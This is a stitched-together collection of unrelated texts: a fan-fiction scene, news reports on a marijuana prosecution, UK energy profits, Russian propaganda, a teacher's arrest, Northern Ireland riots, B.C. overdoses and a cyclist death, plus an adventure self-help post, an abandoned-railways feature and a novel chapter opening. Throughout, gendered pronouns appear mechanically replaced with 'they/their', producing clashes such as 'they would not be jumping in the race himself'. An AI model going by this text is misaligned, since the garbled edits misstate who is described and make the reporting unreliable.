They met on the other side of the room after a few minutes, rather closer to Luna's side than Harry's. They tucked their wand behind their ear and stuck out their arm. Harry was nonplussed for a second, having not shaken hands in months, before switching their wand to their left hand and gamely offering them their right hand. Luna took it in both of their hands, pumping it up and down, before abruptly turning back to the remaining targets in the center of the room. As they walked back towards them, a lilting "Thank you, Harry! I'm sure Zacharias will appreciate it!" floated back towards him. Smiling, Harry shook their head, and followed them to finish putting away the targets.
FILE - In this Sept. 24, 2015, file photo, consultant Jonathan Hunt checks seedlings growing in the new marijuana growing facility on the Flandreau Santee Sioux Reservation in Flandreau, S.D. Hunt, a consultant charged after they worked with the Native American tribe on its plans to open the nation's first marijuana resort will have their case dismissed. Defense attorney Clint Sargent said a judge on Tuesday, Nov. 21, 2017, granted Hunt's request for a suspended sentence. Hunt, 44, of Colorado, paid a $500 fine and about $100 in court costs as a condition of the case being dismissed and the record sealed. (AP Photo/Jay Pickthorn, File)
SIOUX FALLS, S.D. (AP) — A cannabis cultivation expert who was prosecuted in South Dakota after working with a Native American tribe trying to open the nation's first marijuana resort will see their drug case dismissed.
A sentence handed down Tuesday for Jonathan Hunt caps the state's prosecution of two consultants who worked with the Flandreau Santee Sioux on an ambitious venture that the tribe once dubbed an “adult playground” that could bring in $2 million a month.
The plan for a resort north of Sioux Falls was ultimately abandoned after fears of a federal raid culminated with the tribe burning its marijuana crop in 2015.
A state judge agreed to Hunt's request for a suspended imposition of sentence, allowing the case to be dismissed and the record to be sealed after they met the conditions of paying a $500 fine and about $100 in court costs, according to Hunt's attorney, Clint Sargent.
“I feel free,” Hunt told The Associated Press. “I think the whole thing never should have happened.”
Hunt, 44, and Eric Hagen worked for Colorado-based Monarch America, a marijuana consulting company, when they were charged last year after assisting the tribe. The two consultants faced charges for their roles in the cannabis-growing operation.
Hagen, the president and CEO of Monarch America, fought their charges at trial and a jury cleared them of several felony drug counts.
Hunt pleaded guilty to felony conspiracy to possess marijuana after agreeing to cooperate with authorities. They had overseen the Santee Sioux's marijuana crop before it was burned. Hunt, who no longer works with Monarch America, said they now plan to work in the medical and recreational cannabis industry in California.
South Dakota Attorney General Marty Jackley confirmed that Hunt had been sentenced, saying they were held accountable for their role in the Flandreau marijuana case.
“A marijuana resort is a violation of both federal and South Dakota law that would further create public health and safety issues across our state,” Jackley told the AP.
The Santee Sioux announced its plan for the resort in 2015, setting the stage for a collision between the tribe's hopes for economic development and state and federal law.
The tribe began the marijuana growing operation after the Justice Department outlined a new policy clearing the way for American Indian tribes to grow and sell marijuana under the same conditions as some states that have legalized pot.
When tribal leaders initially touted their plan to open the resort on tribal land in Flandreau, tribal President Anthony Reider said they wanted it to be “an adult playground.”
The tribe projected as much as $2 million in monthly profits. The plans included creating a smoking lounge with a nightclub, bar and food service, and eventually an outdoor music venue. The tribe planned to use the money for community services and to provide income to tribal members.
Profit margins at the big six energy providers have hit the highest level on record, according to the regulator, Ofgem, in data that comes just weeks after British Gas raised some prices by 12.5%.
The Ofgem data reveals that the average pre-tax margin among the major power companies rose to 4.48% in 2016, up from 4.15% the year before and just 0.89% in 2009, when the regulator began collecting figures.
The data was first released in July but Ofgem has only been able to present a complete picture now after the inclusion of figures from all of the big six.
Centrica, which owns British Gas, enjoyed consistently the highest margins, running at 7.18% in 2016. SSE and E.ON were the second most profitable, both on a margin of 6.95%.
Centrica provoked uproar this month when it raised prices for 3 million customers, which the chief executive of its consumer business, Mark Hodges, blamed on “an underlying increase in policy and transmission costs”.
The Ofgem data throws doubt on the persistent complaints by the energy companies about shouldering a worsening burden of environmental costs.
The figures show that the cost of environmental and social obligations on the energy companies fell from £109 in the typical dual-fuel bill in 2009 to just £86 in 2015, with a small rise to £91 last year.
Centrica said, while wholesale costs have decreased, they have been offset by rising network and transmission costs, including the rollout of smart meters, and that government mandates and policy costs now represent the most significant part of electricity bills. It added that on a post-tax basis, its profit in 2016 was equal to £52 on the average dual fuel bill of £1,112.
However an earlier analysis of energy company profits by Lazarus Research, looking at all the big six providers except SSE, found that gross margins had expanded from 20.7% to 22.6%, a fourth consecutive annual increase. It singled out gas supply as “particularly profitable”, adding that the figures “highlight why the sector is in the political spotlight”.
The figures are likely to provoke fresh controversy regarding overcharging of consumers. An investigation into the energy market by the Competition and Markets Authority concluded last year that the big six suppliers were overcharging by £1.4bn annually.
During the election campaign, Theresa May pledged to cap bills for 17 million families on the worst-value energy tariffs, but the plan was missing from the Queen's speech – to the delight of big energy companies.
Instead, the business secretary, Greg Clark, told Ofgem to safeguard “customers on the poorest value tariff”, with policy expected to focus on extending an existing ceiling on bills for 4m households on prepayment meters to a further 2.6 million vulnerable customers.
Ofgem said consumers are also increasingly switching suppliers to find better deals. In the month of June 2017, the number of electricity switches reached 380,000, their highest level since June 2011, while gas switching was at its highest since June 2009.
An Ofgem spokesperson said: “In a competitive market, we expect suppliers to drive down costs and the prices they charge their customers; if they don't, their customers will switch to rivals who do.” They said the latest data showed the number of customers on standard variable deals had fallen by almost 1 million over the past six months as more people switched.
They added: “We want many more customers who remain on standard variable tariffs in particular to get a better deal and are stepping up our efforts to make sure that competition works for everyone, whilst also putting in place protections for the vulnerable.”
A review of veg food labelling in the E.U. finds a great deal of growth, and a wealth of opportunities for companies and consumers alike.
Over the past several years, the vegetarian and vegan food sector (referred to collectively as the veg*n food sector) has grown very rapidly. This has meant that many structures within the food industry have not yet caught up. This study, published in Food Science, examines and makes recommendations for improving one of those structures: veg*n food labeling systems in the European Union (E.U.).
The author first describes three common labeling systems used in the E.U. as follows:
The European V-Label. This is a system introduced in 1996 by Swissveg in cooperation with the European Vegetarian Union. It includes both vegetarian and vegan labels and is used throughout Europe.
The Vegetarian Society Approved Symbol. This is a vegetarian-only label distributed by the Vegetarian Society UK. It is very popular in the UK but not in other parts of the world.
The Vegan Flower of The Vegan Society UK. This is the oldest label given exclusively to vegan products. Similarly, this is popular in the UK but not in other parts of the world.
The author predicts that use of the V-Label will continue to grow. This is based on the label's wide reach and the fact that it includes separate labels for vegetarian and vegan products.
The rest of the paper focuses on legal and practical concerns regarding the potential widespread implementation of veg*n labels in the E.U. Significant points include the following:
There are currently no legally binding definitions for the terms “vegetarian” and “vegan” at the E.U. level or in member states. This can create problems when labeling a food item as vegetarian. For example, some cultures consider eggs to be vegetarian while others do not. The author calls for the development of legally binding definitions of both terms at the E.U. level. As a potential starting point, the author cites definitions put in place by Germany's consumer protection ministers.
Definitions created for these terms should be both precise and pragmatic. They must take into account the final product as well as the use of animal substances as processing aids. This includes, for example, the use of gelatin to clarify fruit juice. The author notes that this regulation is critical in order to accommodate veg*ns who refrain from eating animal products for ethical reasons. Similarly, the author recommends that the presence of accidental traces of nonveg*n substances through contamination of equipment should not limit products from being labeled veg*n. This is because the production of these food items would not involve animal exploitation.
There are currently no international standardized control systems in place for ensuring that products receiving labels are in fact veg*n. And there are few resources available to external authorities who could be tasked with the maintenance of such systems. But, the major labeling systems discussed above do use extensive controls. These include comprehensive written documentation supplemented by on-site spot checks. The author also notes that laboratory tests to identify the presence of animal products are currently being developed. Such tests may one day offer cheaper and more efficient controls.
The author summarizes by reiterating the need for standardized definitions of the terms “vegan” and “vegetarian.” The author also highlights the benefits of using one standardized food labelling system, preferably the V-Label, throughout the E.U.
Advocates working in Europe are likely already familiar with the V-Label. And those working in other countries that have no veg*n food labeling systems might look to the V-Label as an example. Interestingly, since the paper's publication, a vegan version of the Vegetarian Society Approved Symbol has also been launched. On the one hand, this may be helpful for consumers; but, on the other hand, this may complicate overall efforts to create a consolidated veg*an labeling system. It may be more beneficial for both consumers and producers if advocates worked together to refine one overall veg*n labeling system.
[Note: Author Renato Pichler is President of Swissveg, and coordinates the European “V-Label” across Europe.]
Sowing distrust and disbelief in Europe and its institutions is the main aim of Russian propaganda in the Czech Republic, according to a new study.
And unlike the attention-grabbing tactics used during the Soviet era, according to research conducted by two academics at Masaryk University in the eastern Czech city of Brno, Moscow is playing a sophisticated long game in the Central European country.
"When you mention propaganda, most people imagine posters, drawings, and videos aimed at eliciting some kind of emotion and altering views," explains Milos Gregor, one of the study's authors. "It turns out those kinds of manipulative techniques are rarely used. The techniques are much more sophisticated and subtler, employed over time to change views and opinions."
The approach is also not isolated to the Czech Republic. Brussels is so concerned with Kremlin efforts to mold minds across the EU that it set up its first operation to counter Russian propaganda in March 2015. EU leaders, especially in the Baltic states, have been alarmed at how Moscow has used its media to gain support for its views and policies.
In the Czech media sphere, ad hominem attacks, finger-pointing, and outright fabrications are all elements in the propaganda practiced by pro-Kremlin Czech news websites, according to Gregor. They stress that Kremlin propaganda efforts are not as focused on challenging individual facts, but rather "framing the debate" in a way that is sympathetic with Moscow's goals.
Migrants Bad, Ukraine Not So Much
The study looked at four news websites, which the authors of the study found disseminate the most pro-Kremlin news. In particular, the study focused on how these sites covered the migrant crisis in Europe, as well as the conflicts in Syria and Ukraine.
Russian propaganda is exploiting the migrant crisis in hopes of sowing distrust in European institutions and its elites, the study found. On the other hand, in the conflicts in Ukraine and Syria, where Russian actions are said to be fueling tensions, if not worse in eastern Ukraine, Russian propaganda seeks to minimize such perceptions.
"Articles on the migrant crisis were very emotional, using lots of emotional techniques, spreading rumors, appealing to fear, etc. In contrast, with the conflict in Ukraine, or Syria, in these articles the events were downplayed perhaps to leave the reader with a sense it was not such a big problem or not such a horrible event as first may appear," Gregor explains.
Gregor says information and articles critical of EU or U.S. policy are fine as long as they are grounded in fact. That, Gregor says, is not the case with Russian propaganda.
"The fact that someone criticizes the European Union doesn't mean, of course, that they're serving Russia or that they are paid by the Kremlin," Gregor explains. "Of course the European Union has taken political steps that we can criticize, and that doesn't mean it tactically serves the Kremlin.
"We focused on whether criticism of the European Union was, let's say, fair and factual or whether manipulative techniques were employed, either with labeling, demonization of an 'enemy,' or something along those lines," they add.
Outspoken Or Manipulative?
Speaking at a press conference earlier this week in Prague to unveil the study, its other author, Petra Vejvodova, also stressed the sophistication of Kremlin efforts, saying they rarely if ever blatantly back Moscow policy or its leaders.
Vejvodova noted that Russian President Vladimir Putin was cited in only 30 percent of the material examined by the study. That put them third behind Czech President Milos Zeman and Finance Minister Andrej Babis.
The four websites examined in the study are the Czech version of Sputnik, a Kremlin-controlled news services operating in several countries, two openly pro-Russian sites, AC24 and Svet kolem nas (World Around Us), and Parlamentni listy (Parliament Papers).
The inclusion of Parlamentni listy has stirred some controversy.
Daniel Kaiser, a commentator at Echo24.cz, noted it had by far the largest readership of any of the five sites in the study. "Even the casual reader will notice that this portal is open to all, the more outspoken and emotional, the better," Kaiser wrote.
Naturally, the head of the publishing company behind Parlamentni listy didn't agree with its characterization as pro-Kremlin. "Why were we included among the pro-Kremlin websites? Because we are a big and influential organization, which obviously bothers someone," Jan Holoubek told iDNES.cz. "More important for us is our 300,000 readers. Let each make up their mind himself."
Gregor says content on the site was found to have employed the same "manipulative" techniques as the openly pro-Kremlin sites, even more so in some coverage of foreign news.
Activists in the Czech Republic say the best way to counter Kremlin propaganda is to raise awareness, especially among youth.
The NGO Clovek v Tisni (Person In Need) is offering schools an audiovisual study program on propaganda, which has reportedly met with great interest from educational administrators.
Please enable Javascript to watch this video
YUKON, Okla. - We're learning more information about the arrest of a teacher at Yukon High School.
On Thursday, officials with the Canadian County Sheriff's Office announced that they had arrested 22-year-old Hunter Day, a teacher at Yukon High School.
Deputies say that the investigation began after they received a complaint by parents who said that Day was having inappropriate contact with their son.
Authorities say the teen's parents told investigators that they found text messages and nude photographs on their son's cell phone.
Investigators say they determined that Day and the teenage boy had already had sex, and that they had made plans to meet at their home to have sex again on Wednesday.
“This is a classic case of a serious breach of public trust. School teachers are entrusted to protect and educate our children, not to engage in an unlawful sexual relationship with them,” said Canadian County Sheriff Chris West.
Authorities with the sheriff's office used the boy's cell phone and pretended to be them while contacting Day. Investigators asked Day if the meeting was still on, and they allegedly said it was but added that they should hurry before their husband got home from work.
Day texted the teen's cell phone that the "door's unlocked as usual," and investigators found Day sitting on the living room floor with the lights turned off and candles lit.
Jail records show they were arrested for second-degree rape, facilitating sexual contact with a minor and possessing child pornography.
Media playback is unsupported on your device Media caption The BBC's Mark Simpson said the timing of the protests was significant
Four police officers have been injured and Alliance Party properties targeted during trouble involving loyalists in Northern Ireland.
Some 1,500 people gathered in the town to protest against Belfast City Council's decision to stop flying the union flag every day.
Earlier, an Alliance Party office in Carrickfergus was destroyed.
The home of a couple who are both Alliance Party councillors in Bangor, County Down, was also attacked.
Paint was thrown at Michael and Christine Bower's home, smashing a front window close to where their daughter normally plays.
No-one was injured although the couple said they were shocked by what had happened.
The violence came during an important week for Northern Ireland as US Secretary of State Hillary Clinton is due to visit on Friday.
About 1,500 people had gathered at the Irish Gate roundabout in Carrickfergus earlier on Wednesday, police said, to protest against the council's decision.
The crowd dispersed but some people stayed behind, trouble broke out and missiles, bottles and masonry were thrown at police.
Image caption An Alliance Party office was ransacked during the trouble
Rioting continued in nearby West Street, where Alliance MLA Stewart Dickson has a constituency office.
It was ransacked and the rioters tried to set it on fire. The building was smoke damaged.
Mr Dickson said they had received hundreds of calls and texts from people across the country who were "sickened by the violence".
They appealed to Mrs Clinton to come and visit their office during their visit to Northern Ireland.
"I want Hillary Clinton to see at first hand what a full frontal attack on democracy looks like," they said.
Police fired a number of baton rounds at the crowd. They said a number of officers were injured in the riot but their injuries were not thought to be life threatening.
Analysis Alliance are saying the two main unionist parties have to bear responsibilities. Sammy Wilson, DUP, said the people involved in the violence did a disservice to the flag they were supposedly trying to protect. Mike Nesbitt, UUP, talked about unionism needing brains not brawn. But it didn't take long before we had cantankerous exchanges between them. Sammy Wilson heard Alliance leader David Ford, effectively accusing them of hypocrisy. They came back with this assertion that Alliance should have known that opening this Pandora's box would lead to something like this and if they didn't they were out of touch.
PSNI Assistant chief Constable Will Kerr said the protest was organised through social networking sites.
"What we saw in Carrickfergus was the result of bringing large numbers of people out onto the street where we can't control those large numbers of people," they said.
"We saw criminal, thuggish, intimidating behaviour here. We need to put a stop to this very quickly."
By 22:20 GMT on Wednesday, police said the trouble had come to an end, although they were maintaining a presence in Carrickfergus.
Two men and two women have been arrested in connection with the violence.
Assembly call
Michael Bower, a North Down councillor, said they were sitting in their living room at about 23:00 GMT on Wednesday when the attack happened. The device shattered a pane in the double-glazed window of the front living room.
"My daughter who is 17-months-old had just gone to bed when I heard an explosion against the window," they said.
"I guessed it was some sort of attack on our family home. I checked that my wife and daughter were okay. The paint bomb hit the corner of the room where my daughter usually plays.
"There is damage to the window, but it could so easily have been so much worse. If events had been different, a young life could have been lost. I would plead with people to calm down and to stop attacking representatives doing their best to support their communities."
North Down Alliance MLA Stephen Farry said there was an attempted arson attack on their constituency office in Bangor.
"Petrol or some other accelerant was poured over my shutters by a number of people," they said.
"Fortunately, they were interrupted by a passing police patrol and fled the scene."
Meanwhile, Alliance leader David Ford has requested the Northern Ireland Assembly be recalled on Thursday to discuss the attacks.
They said what had happened was "a direct assault on democracy of the worst possible kind".
"I believe there is now a heavy responsibility on Peter Robinson and Mike Nesbitt to provide an alternative kind of leadership which would divert people away from the kind of trouble," they said.
'Brains, not brawn'
DUP MP Sammy Wilson has condemned the attack in Carrickfergus.
"People are entitled to peacefully protest but there is absolutely no justification for the carnage which has been caused in Carrickfergus this evening," they said.
"Those involved do a disservice to the flag they claim to defend. Today, in the House of Commons, several MPs backed the union flag being flown from city hall, however this criminal behaviour undermines and distracts from the argument.
"I urge those involved to step back from this criminal activity and channel their energies through democratic politics."
Ulster Unionist leader Mike Nesbitt MLA said violence was legally and morally wrong.
They said: "What unionism needs today is brains, not brawn. We need an analysis, a strategy and an agreed outcome. I am happy to talk to anyone, if they commit to repent and desist from violence."
Jim Allister of TUV said the violence was "utterly wrong" and was not the way forward.
A loyalist flag protest also took place in Lurgan.
This guest post was written by Robin Krieglstein, founder of GoalTribe.
I know a little something about living an adventurous life. I've hot air ballooned Kathmandu, glacier trekked Patagonia, gone paragliding in the Andes, slept in a snow-shelter at the top of the Rocky Mountains, scuba-dived in the tropics, camel trekked the Sahara, rock-climbed in Thailand and been on an African safari. Oh, and I've been skydiving, cliff diving, rafting on Class V white water, and I was even swept over a waterfall once.
Huff, huff… You thought I was finished, didn't you? 😉
I've also visited 20% of the world's countries and circled the globe twice. I've explored ancient castles, palaces, temples, tombs, catacombs and labyrinths. I've stayed in 5-star hotels, caves and dessert caravan tents. I've seen the pyramids, Machu Picchu, the Amazon, the African savanna, the Himalayas, the Eiffel Tower, the Acropolis in Athens and the Taj Mahal.
And I have to tell you – it's been extraordinary. It's an absolutely amazing, brilliant, beautiful world out there filled with dazzling wonders that are readily available for you to experience. You don't have to be rich. You don't have to be exceptional. If you want to experience it all, you just have to make a decision, set some goals, and make it happen.
Here's how:
Step 1: Discover Your Vista's of Adventure
First get a clear vision of what the word ‘adventure' means to you. Take 30 minutes, put on some inspiring music, get excited and write down everything that comes to mind when you think about an adventure. What movies inspire you? Indiana Jones? James Bond? The Bourne Series? What types of adventures appeal to you? Adventurous sports? Travel? The great outdoors? What specific activities sound like a heart-pounding blast? Bungee jumping? Exploring ancient ruins? Heli-skiing (skiing areas you can only get to by helicopter)?
Step 2: Choose 5 Specific Adventure Goals
Life is short! Now is the time to get real. Now is the moment to make a commitment to experience the life adventures you want to experience before you die. Choose 5 adventure goals from your brainstorm that you're most excited about. Pick one that you will do within 3 months, one that you will do by the end of the year, one within 2 years, one within 3 years and one within 5 years. The first 3-month goal should be exciting, but reasonable, so it's actually possible to achieve in a short time frame. This one is very important because it will help you build momentum and faith in yourself.
Also, be firm and DECIDE that you WILL give yourself the gift of an adventurous life. Spend an additional 5 minutes writing out why this is important to you, and then write a formal commitment to yourself and hang it where you'll see it every day.
Step 3: Learn How to Take the First Step
Now take your first 3-month goal and figure out what you need to do to make it a reality. One of the most common reasons people don't make their life more exciting and adventurous is that they don't know how to start. But that's okay – you can learn. Search the Internet, the library, or talk to people who've done what you're planning to do. Ask questions. Make calls. Figure out what steps you need to take. There are companies that arrange everything from local rock-climbing and white-water rafting trips to round-the-world, multi-month adventures. Also, read “25 Ways to Learn How to Do Absolutely Anything” for more ideas.
Step 4: Create a Plan for Your First Adventure
Once you understand the initial steps that are required to embark on your first adventure goal, create a clear plan. Make a detailed list of what actions you need to take and set a date for completing each action so that you'll be off experiencing this first adventure in exactly 3 months from today.
Step 5: Jump into Action Immediately
If you're like most people, you've probably just read the previous 4 steps without actually doing anything. And guess what? You're in danger of finishing this article without ever taking action. Here's how to make sure that doesn't happen:
Take action immediately! Yes, right now! Start brainstorming your adventure goals.
Pick your top 5 goals. And then do one more step…
Figure out what the logical first step is towards your first adventure goal.
Additional Tips on Living an Adventurous Life
Overcoming your fears is half the fun of adventuring. The adrenalin rush can be exhilarating! And when it passes, and you realize you're still standing, you feel a great sense of accomplishment. Remember most fears are not real. Fear could stand for: “False Experiences Appearing Real.” Fear is also a great way to get people's attention and motivate them to do things; so the media, politicians, companies and many other organizations spend a lot of time and money trying to make the world seem like a scary place. It's not. Even for people living adventurous lives, disaster rarely strikes. That's why when it does strike it makes the evening news… because it's rare. Ultimately the secret to fear is: Feel the fear and do it anyway. Whenever you have a choice of activities to do, pick the one that will make for a better story. Don't have the time? Instead of going to see an action movie, take action in your own life. Instead of sitting in front of the TV, sit on a ski lift. Instead of sleeping in your bed, sleep on a bus on the way to the Grand Canyon. Instead of going out to the park, go out rock climbing. Instead of vacationing at Disneyland, vacation in Thailand. Don't have the money? International travel is much cheaper than it seems. Just give up a few luxuries and don't try to keep living exactly the same way you do at home. You will keep costs down and have a much more profound experience if you eat what the locals eat, sleep like the locals sleep and travel like the locals travel. Visit countries that are more affordable than your home country. As for adventure sports, most of them are filled with specialized, expensive gear that you don't need. You need SOME to be safe, but don't be fooled into a thousand dollar shopping spree for a weekend camping trip. Rent, borrow or go without. Yes you can! For additional advice on doing the impossible, I recommend reading (or rereading) Marc and Angel's excellent post “How to Walk on Water.” And one last tip from someone who's been there: As your life unfolds with new excitement, experiences and adventure, you must, must, must keep a journal of your experiences. Also, take thousands of pictures and lock those precious moments into your memory forever. Someday, when you're sitting with your children or grandchildren, you'll be so happy you did.
What adventures would you like to conquer? Please share your thoughts in the comments section below.
Robin Krieglstein is the Founder and CEO of GoalTribe, the most advanced goal achievement social network on the planet. GoalTribe offers free, step-by-step guidance to plan your goals, get a support team, build motivation, track your progress and overcome all obstacles. On GoalTribe's blog, Robin explores life changing ideas colored by stories from their around-the-world travels through 38 countries.
FRC President Tony Perkins speaks during The Family Research Council (FRC) Action Values Voter Summit September 14, 2012 at a hotel in Washington, DC. The summit is an annual political conference for US social conservative activists and elected officials. AFP PHOTO/Mandel NGAN (Photo credit should read MANDEL NGAN/AFP/GettyImages)
Tony Perkins, president of the Family Research Council, suggested Wednesday that they may run for David Vitter's Senate seat should the Republican senator be elected governor next year.
In an interview with The Hill, Perkins said they would not rule out running for Vitter's seat should it become open.
“I never say never anymore,” they said, adding that they intend to stay in their role at the conservative Christian group for the "foreseeable future."
Perkins also weighed in on Rep. Bill Cassidy (R-La.), the GOP establishment-backed candidate running to unseat Sen. Mary Landrieu (D-La.) this year.
“I think their problem is their record. He's been pretty weak on the issues. If the Republicans want to win, they actually need to find a stronger candidate," Perkins said.
Despite their strong criticism of Cassidy, Perkins said they would not be jumping in the race himself.
“I would rather somebody else does it," they said.
Boxee is extending its media center access to Windows and will shortly change its "alpha" status to "beta".
The open source media site has also announced four major new app partnerships that will be available to everyone downloading its software.
While Boxee has been available for Linux computers and Macs, it was only possible to get it for Windows as an invite-only alpha.
Despite this it has gained enthusiastic following for its support of almost any major file type and Internet apps.
Boxee has promised to keep the three platforms in sync as the service undergoes updates and upgrades.
With around 120 apps in the Boxee App Box, users can now choose from the likes of MLB.tv, Current, Digg, and Tumblr.
Among the new partnerships announced at its App Developer Challenge in San Francisco, the Major League Baseball one is the most interesting.
The MLB arrangement marks Boxee's first live streaming deal. MLB.tv Premium subs can now stream games through Boxee's system in full HD from anywhere in the country on their TV.
Vancouver, Victoria and Surrey continue to record the highest number of suspected drug overdose deaths in B.C. this year, with the majority linked to fentanyl, according to statistics released Thursday by the B.C. Coroners Service.
From January through July 2017, 226 people died in Vancouver of an overdose. Surrey recorded 101 deaths for the same time period, and Victoria lost 57 people. Kelowna recorded 50 deaths. Richmond, Coquitlam, Vernon and Chilliwack saw the lowest number of deaths at 16 in each municipality.
article continues below
Province-wide, fentanyl, which is a deadly synthetic opioid, was detected in more than four of every five deaths through the first seven months of this year. More than 700 of the 876 suspected overdose deaths were linked to fentanyl.
That's an increase of 143 per cent over the same period in 2016. In most cases, fentanyl was combined with other illicit drugs, most often cocaine, heroin and methamphetamine, which is a concern identified by Chief Coroner Lisa Lapointe.
“This presents huge challenges for those using illicit drugs and the risk is high," Lapointe said in a news release. "Although it's heartening to see a decline in deaths month-to-month since March, we continue to see far too many deaths in our communities.”
Preliminary data shows there were 91 suspected drugs overdose deaths in July 2017, almost three per day, and a 30 per cent increase from July 2016. The suspected number of deaths for the year-to-date is now 876, up from 482 at this time in 2016, an increase of 82 per cent from the same period in 2016.
The statistics for Vancouver show an encouraging trend, with a high of 49 deaths recorded in January dropping to 18 in July. The city, however, is still on pace to reach or surpass 400 deaths by the end of the year.
As in previous months, most deaths have occurred indoors, in many cases when people are using alone and without the ability to get help. Four out of every five people who died were men, the majority aged 30 to 39.
“We continue to share our latest data and the message of risk with the hope that it will reach drug-users and their family and friends, ultimately helping to reduce harm and risk and curb the trend with this complex health condition,” Lapointe said. “We also hope that public awareness of the continuing toll on lives will support open communication about drug use and how we can best support those dependent on illicit substances."
None of the deaths occurred at supervised injection sites or drug overdose prevention sites set up in hotels and other facilities throughout Vancouver and the rest of the province.
Vancouver Coastal Health Authority announced last month that it was expanding its fentanyl-checking service from the Insite supervised injection site on East Hastings to overdose prevention sites.
"When we launched the checking service at Insite last year we were hoping it would persuade people to use more safely," said Dr. Mark Lysyshyn, a medical health officer with health authority, in a news release. "This is exactly what we're seeing at Insite, so now we can arm even more people with information about their risks, so they will make safer choices."
mhowell@vancourier.com
@Howellings
A bicyclist was killed Monday afternoon (Aug. 3) in a crash with a dump truck at Canal and Broad streets. New Orleans police said the truck and the 52-year-old cyclist both were lakebound on Canal shortly after 1 p.m. when the two vehicles collided.
The truck's 34-year-old driver was being tested for impairment, which police said is common in fatal wrecks. The truck remained parked on Broad Street. Motorists on Broad heading toward Esplanade were being diverted to Canal Street.
Four other bicyclists have been killed this year in crashes with motorists on New Orleans streets. Their deaths have renewed calls for improved infrastructure and awareness of both motorist and cyclist safety.
Robert Jones said they and their family were about two cars behind the dump truck and watched the collision unfold. They said the truck had the green light and was making a right turn onto Broad. The bicyclist, who was riding close to the curb, tried to stop but couldn't in time, they said.
"It was too late for him." Jones said. "It was just a blink of an eye."
The bicyclist crashed into the dump truck in what Jones called a "nasty scene." Witnesses described a grotesque image of the victim's body laying on the street next to their mangled bicycle.
The bicyclist died at the scene. Their body was loaded into a coroner's office van.
It was the second fatal traffic incident of the day. Around 1 a.m., a 28-year-old man was killed and their 32-year-old passenger hospitalized, police said, after their sport-utility vehicle crashed into the back of a tractor-trailer on westbound Interstate 10 near Downman Road.
. . . . . . .
NOLA.com | The Times-Picayune reporter Carlie Kollath Wells contributed to this report.
In Abandoned, Transportation, Travel & Living / By Tom / 24 September 2010
The railways that sprang from the Industrial Revolution revolutionised transport, and journeys that had once taken months could now be completed in weeks or even days. Industry benefitted from the efficient movement of goods, and passenger services allowed people to commute greater distances while fostering a new means of travel and tourism. But nothing lasts forever, and today the railways are a ghostly shadow of their former glory, offering a wealth of historic abandonments that have been documented by urban explorers.
(Images 1 & 4 licensed under Creative Commons 2.0 Generic & ShareAlike 2.0 Generic; 2, 3 in public domain)
While rail travel remains an important means of transport for goods and people, it was upstaged by cars and planes during the twentieth century and never quite recovered. Depleted natural resources, and the longterm inviability of many industries in a technologically advancing world, have contributed to the network of abandoned railway lines winding their way across the continents.
(Left image in public domain; right licensed under Creative Commons 3.0 Unported)
Ironically railways have advanced, with bullet trains and improved high speed links connecting capital cities like Paris and London. In an age where air travel is increasingly frustrating due to cost and security issues, fast modern trains are comfortable, convenient and environmentally friendly travel options. But so much of the infrastructure has been eliminated that reinstating it is a colossal undertaking, although some countries are taking steps to do so.
(1, 2, 3, 4, 5 licensed under Creative Commons ShareAlike 2.0; 6 under Creative Commons 2.0 Generic)
It's not all bad news, as many railway routes have become scenic cycle routes (like the Tissington Trail, above), and abandoned tracks provide a nostalgic glimpse back to the golden age of railways. That romantic notion of wondering where the tracks lead can now be realised without even buying a ticket, and photographers can indulge in the strange visual beauty fostered by urban and industrial decay.
(Image 1 licensed under CC ShareAlike 2.0 Generic, 5 under CC 2.0 Generic; 2, 3, 4 in public domain)
When railways become abandoned, a much wider infrastructure is either dismantled or neglected. And without constant maintenance and human intervention, it doesn't take long for bridges and tunnels to become unsafe or even collapse. While some are maintained for hikers, used for power cables or even converted into road tunnels, many are firmly shut-off to the public behind vast iron gates.
(1 licensed under CC-ShareAlike 3.0 Unported, 2, 3, 4 in public domain; 5 under CC-3.0 Unported)
Surplus locomotives are usually scrapped or saved by museums. It's rare for trains to be abandoned for long periods of time on the very tracks they once operated on. But as we've seen with aircraft abandoned in isolated and inhospitable regions, rusting train carcasses can linger on for years. One of the most famous train graveyards in the world is at Uyuni in the Bolivian desert (above). These rusty wrecks have been abandoned since the 1940s and have become a major tourist attraction.
(Images via English Russia)
More isolated train carcasses lie along the dreaded route of Stalin's “Railway of Bones” in the far northern reaches of Russia, deep inside the Arctic Circle. Like Uyuni, railway engines still stand on their original tracks in this sinister place that claimed almost 15,000 lives.
(Image 1 in public domain; 2 & 3 licensed under ShareAlike 2.0 Generic; 4, 5, 6; CC-2.0 Generic)
With tracks dismantled or abandoned and no trains to serve them, railway stations have also been left to the mercy of dereliction, demolition or developers. Stations range in size and stature from small provincial holts to magnificent terminals like Michigan Central Station in Detroit, and while some are repurposed, most are either bulldozed or left to the vandals. Find out more on our Rust Belt Road Trip.
(Images licensed under Creative Commons Attribution 2.0 Generic)
At Urban Ghosts we find abandoned places historically fascinating and visually intriguing, reminding us of how fleeting life is for buildings and objects as well as people. We hate to see old places demolished, and welcome any visionary reintegration of their historic character into the modern world.
(Images by author)
New York's High Line is a perfect example of what can be accomplished when a group of people comes together to save an industrial structure that may hold appeal but little apparent functional use. But its reincarnation as a popular public park near the Chelsea neighbourhood proves that an industrial landmark can be the perfect Sunday stroll.
Related Articles:
5 Awesome Abandoned Railway Stations
Derelict: Manchester Mayfield Railway Station
Subterranean Botanic Gardens: Glasgow's Silent Railway Station
Abandoned Washington and Great Falls Electric Railroad
Gary, Indiana: 8 Amazing Abandonment Images
If you enjoyed this article, explore more urban ghosts within our archives. You can also subscribe to our feed, become our friend on Facebook or follow us on Twitter.
[This is a chapter from my latest novel, a sequel to The Fall of Doc Future and Skybreaker's Call. The start is here, and links to my other work here. It can be read on its own, but contains spoilers for those two books. I usually post a new chapter about every two weeks, and the next one is planned for around March 8th.]
Previous: Chapter 19
There was a loud crunch as Yiskah sent another heavy combat bot flying towards the wall with a kick. Flicker watched it hit. They were conducting the Box visit postmortem in the training room, because Flicker didn't want to wait. When she'd asked Yiskah what was so urgent about beating the crap out of a bunch of robots, she'd gotten a dark look.
“Because it was a rough visit even before I had to mind-probe the Giggler,” said Yiskah. "And all I found was confirmation that Tabula Rasa selectively wiped their memory of the escape. Better robots than people.“
Which was a good enough reason to put up with the inconvenience.
"Okay,” said Flicker, turning back to the portable interface. "DASI, what are your revised estimates on Tabula Rasa's escape, given the new data that Jumping Spider and Breakpoint sent?“
